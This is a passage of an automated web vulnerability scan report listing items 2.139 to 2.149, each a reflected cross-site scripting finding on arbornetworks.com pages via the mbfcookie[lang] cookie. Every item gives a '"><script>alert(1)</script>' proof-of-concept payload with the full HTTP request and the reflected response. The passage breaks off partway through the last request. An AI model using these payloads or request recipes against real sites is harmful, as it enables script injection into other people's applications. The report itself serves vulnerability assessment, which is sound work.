<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="enbfa46\"><script>alert(1)</script>3a748a1b21e">
...[SNIP]...

2.139. http://www.arbornetworks.com/en/contact-us.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/contact-us.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56d01"><script>alert(1)</script>e5f9fcae8fd was submitted in the mbfcookie[lang] cookie. This input was echoed as 56d01\"><script>alert(1)</script>e5f9fcae8fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/contact-us.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en56d01"><script>alert(1)</script>e5f9fcae8fd; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:54:57 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=d84e329f7da92c3b9806916aaf72b74b; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:54:58 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:54:58 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:54:59 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:55:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="en56d01\"><script>alert(1)</script>e5f9fcae8fd">
...[SNIP]...

2.140. http://www.arbornetworks.com/en/customer-solution-briefs.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/customer-solution-briefs.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d93e"><script>alert(1)</script>110881cc17b was submitted in the mbfcookie[lang] cookie. This input was echoed as 5d93e\"><script>alert(1)</script>110881cc17b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/customer-solution-briefs.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en5d93e"><script>alert(1)</script>110881cc17b; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:50:09 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=6ffdd77ca83c0b6a8ec34466430c8f3a; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:50:11 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:50:11 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:50:12 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:50:12 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="en5d93e\"><script>alert(1)</script>110881cc17b">
...[SNIP]...

2.141. http://www.arbornetworks.com/en/fingerprint-sharing-alliance-defending-against-network-attacks-2.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/fingerprint-sharing-alliance-defending-against-network-attacks-2.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68d52"><script>alert(1)</script>29df373fe4f was submitted in the mbfcookie[lang] cookie. This input was echoed as 68d52\"><script>alert(1)</script>29df373fe4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/fingerprint-sharing-alliance-defending-against-network-attacks-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en68d52"><script>alert(1)</script>29df373fe4f; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:53:35 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=42b44ca8a06b1e8283bd881cdb5ffea3; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:53:35 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:53:35 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:53:36 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:53:37 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<meta lang="en68d52\"><script>alert(1)</script>29df373fe4f">
...[SNIP]...

2.142. http://www.arbornetworks.com/en/ipv6-report.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/ipv6-report.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e8e4"><script>alert(1)</script>c0ea527a00e was submitted in the mbfcookie[lang] cookie. This input was echoed as 4e8e4\"><script>alert(1)</script>c0ea527a00e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/ipv6-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en4e8e4"><script>alert(1)</script>c0ea527a00e; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:57:22 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=dfb89dd8541f4cde83a78802c4ae7fd8; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:57:22 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:57:22 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:57:23 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 02 Feb 2011 23:57:46 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="en4e8e4\"><script>alert(1)</script>c0ea527a00e">
...[SNIP]...

2.143. http://www.arbornetworks.com/en/meet-our-partners.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/meet-our-partners.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e5c7"><script>alert(1)</script>adb9c3d2480 was submitted in the mbfcookie[lang] cookie. This input was echoed as 8e5c7\"><script>alert(1)</script>adb9c3d2480 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/meet-our-partners.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en8e5c7"><script>alert(1)</script>adb9c3d2480; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:53:38 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=52ba42fdb49e26026c1037d4df0f9673; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:53:39 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:53:39 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:53:40 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:53:40 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...
<meta lang="en8e5c7\"><script>alert(1)</script>adb9c3d2480">
...[SNIP]...

2.144. http://www.arbornetworks.com/en/network-monitoring-security-news-events.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/network-monitoring-security-news-events.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83849"><script>alert(1)</script>0ce72120c8d was submitted in the mbfcookie[lang] cookie. This input was echoed as 83849\"><script>alert(1)</script>0ce72120c8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/network-monitoring-security-news-events.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en83849"><script>alert(1)</script>0ce72120c8d; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:49:14 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=f6bf29a4fc59f7f5053553da10a007f5; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:49:15 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:49:15 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:49:16 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:49:17 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...
<meta lang="en83849\"><script>alert(1)</script>0ce72120c8d">
...[SNIP]...

2.145. http://www.arbornetworks.com/en/network-security-experts-2.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/network-security-experts-2.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6eaac"><script>alert(1)</script>506cb8ffb11 was submitted in the mbfcookie[lang] cookie. This input was echoed as 6eaac\"><script>alert(1)</script>506cb8ffb11 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/network-security-experts-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en6eaac"><script>alert(1)</script>506cb8ffb11; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:53:35 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=0334d60269ba7b2713cf2ec3bc3eb1a5; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:53:35 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:53:35 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:53:36 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:53:37 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<meta lang="en6eaac\"><script>alert(1)</script>506cb8ffb11">
...[SNIP]...

2.146. http://www.arbornetworks.com/en/network-security-monitoring-solutions-for-your-industry.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/network-security-monitoring-solutions-for-your-industry.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68ce7"><script>alert(1)</script>36f0a831d17 was submitted in the mbfcookie[lang] cookie. This input was echoed as 68ce7\"><script>alert(1)</script>36f0a831d17 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/network-security-monitoring-solutions-for-your-industry.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en68ce7"><script>alert(1)</script>36f0a831d17; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:49:59 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=4c85c8c200e6261bcaa26b721b6bfaa8; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:50:00 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:50:00 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:50:01 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:50:01 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...
<meta lang="en68ce7\"><script>alert(1)</script>36f0a831d17">
...[SNIP]...

2.147. http://www.arbornetworks.com/en/network-security-research-2.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/network-security-research-2.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fba46"><script>alert(1)</script>e9a751b4cd1 was submitted in the mbfcookie[lang] cookie. This input was echoed as fba46\"><script>alert(1)</script>e9a751b4cd1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/network-security-research-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=enfba46"><script>alert(1)</script>e9a751b4cd1; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:52:59 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=2df89d8416b69bee970701cde6d4e0ba; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:53:00 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:53:00 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:53:01 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:53:01 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: PartnerSale
...[SNIP]...
<meta lang="enfba46\"><script>alert(1)</script>e9a751b4cd1">
...[SNIP]...

2.148. http://www.arbornetworks.com/en/network-security-visibility-products-235.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/network-security-visibility-products-235.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b951"><script>alert(1)</script>d5453ad5523 was submitted in the mbfcookie[lang] cookie. This input was echoed as 6b951\"><script>alert(1)</script>d5453ad5523 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/network-security-visibility-products-235.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en6b951"><script>alert(1)</script>d5453ad5523; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:49:13 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=93ec880098c8903f7b6b1ba2875f8aad; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:49:14 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:49:14 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:49:15 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:49:15 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...
<meta lang="en6b951\"><script>alert(1)</script>d5453ad5523">
...[SNIP]...

2.149. http://www.arbornetworks.com/en/network-solutions-we-provide.html [mbfcookie[lang] cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/network-solutions-we-provide.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a99e4"><script>alert(1)</script>5e86c72a29f was submitted in the mbfcookie[lang] cookie. This input was echoed as a99e4\"><script>alert(1)</script>5e86c72a29f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/network-solutions-we-provide.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
